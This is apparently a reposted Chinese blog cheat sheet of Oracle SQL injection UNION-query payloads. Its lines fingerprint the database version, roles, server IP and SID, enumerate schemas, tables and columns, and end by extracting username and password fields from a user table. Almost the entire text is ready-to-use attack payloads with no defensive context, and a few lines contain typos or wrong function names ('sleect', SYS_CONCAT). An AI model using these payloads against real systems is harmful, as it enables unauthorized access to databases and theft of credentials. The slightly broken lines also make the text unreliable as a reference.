oracle数据库注入联合查询基本语句

oracle对列的类型比较严谨,所以要用null,可以匹配任意类型

oracle中的dual表是一个单行单列的虚拟表

Dual是Oracle中的一个实际存在的表,任何用户均可读取

Oracle版本信息:union select null,(select banner from sys.v_$version where rownum=1),null from dual –

当前用户权限: (select *from session_roles)

当前数据库版本:(select banner from sys.v_$version where rownum=1)

服务器监听ip:(select utl_inaddr.get_host_address from dual)

服务器操作系统: (select member from v$logfile where rownum=1)

服务器sid: (select instance_name from v$instance)

当前连接用户: (select SYS_CONCAT (‘USERNV’,‘CURRENT_USER’) from dual)

当前用户: (SELECT user FROM dual)

查询库名:union sleect null,(select owner from all_tables where rownum=1),null from dual –

​ union select null,(select owner from all_tables where rownum=1 and owner <>‘SYS’),null from dual–

查询表:union select null,(select table_name from user_tables where rownum=1),null from dual –

​ union select null,(select table_name from user_tables where rownum=1 and table_name

​ <>‘T_USER’),null from dual –

查询列:union select null,(select column_name from user_tab_columns where table_name=‘T_USER’ and rownum=1),null from dual –

​ union select null,(select column_name from user_tab_columns where table_name=‘T_USER’ and column_name<>‘SUSER’ and rownum=1),null from dual –

​ union select null,(select column_name from user_tab_columns where table_name=‘T_USER’ and column_name<>‘SUSER’ and column_name<>‘SPWD’ and rownum=1),null from dual –

查询数据:union select null,(SELECT CONCAT(SNAME,SUSER,SPWD) FROM T_USER), null from dual –

猜你喜欢

转载自blog.csdn.net/bwt_D/article/details/121291323